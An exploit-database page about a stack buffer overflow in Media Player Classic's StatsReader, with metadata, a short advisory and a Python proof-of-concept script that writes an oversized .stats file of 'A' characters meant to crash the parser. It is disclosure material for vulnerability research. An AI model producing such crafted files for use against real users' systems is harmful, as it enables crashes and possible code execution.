header-logo
Suggest Exploit
vendor:
Media Player classic
by:
ItSecTeam
9,3
CVSS
HIGH
Stack Buffer Overflow
119
CWE
Product Name: Media Player classic
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2020

Media Player classic StatsReader (.stats file) stack buffer Overflow poc

A stack buffer overflow vulnerability exists in Media Player classic StatsReader (.stats file) which could allow an attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to insufficient boundary checks when processing a specially crafted .stats file. An attacker can exploit this vulnerability by enticing a user to open a malicious .stats file.

Mitigation:

Update to the latest version of Media Player classic StatsReader (.stats file)
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# #############################################################################
# Media Player classic StatsReader (.stats file) stack buffer Overflow poc
# Software Link: http://mpc-hc.sourceforge.net/download-media-player-classic-hc.html
# Tested in : Windows XP SP3
# Credit : ItSecTeam
# mail : Bug@ItSecTeam.com
# Web:  WwW.ITSecTeam.com
# Found by: PLATEN @ ItSecTeam
# Special Tanks : M3hr@n.S - B3hz4d - Cdef3nder
# patch: C:\Program Files (x86)\K-Lite Codec Pack\Tools\StatsReader.exe
#        Usage: ./stats-poc.py
# #############################################################################
#
print """
[~] Media Player clissic StatsReader (.stats file) stack buffer Overflow poc
[~] mail : Bug@ItSecTeam.com
[~] Web:  WwW.ITSecTeam.com
[~] Find by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam
"""

data= "\x41" *500000
try:
        file=open("media-poc.stats",'w')
        file.write( data )
        file.close()
        print   ("[+] File created successfully: media-poc.stats" )
except:
        print "[-] Error cant write file to system\n"

Navigation

Suggest Exploit

Services By CQR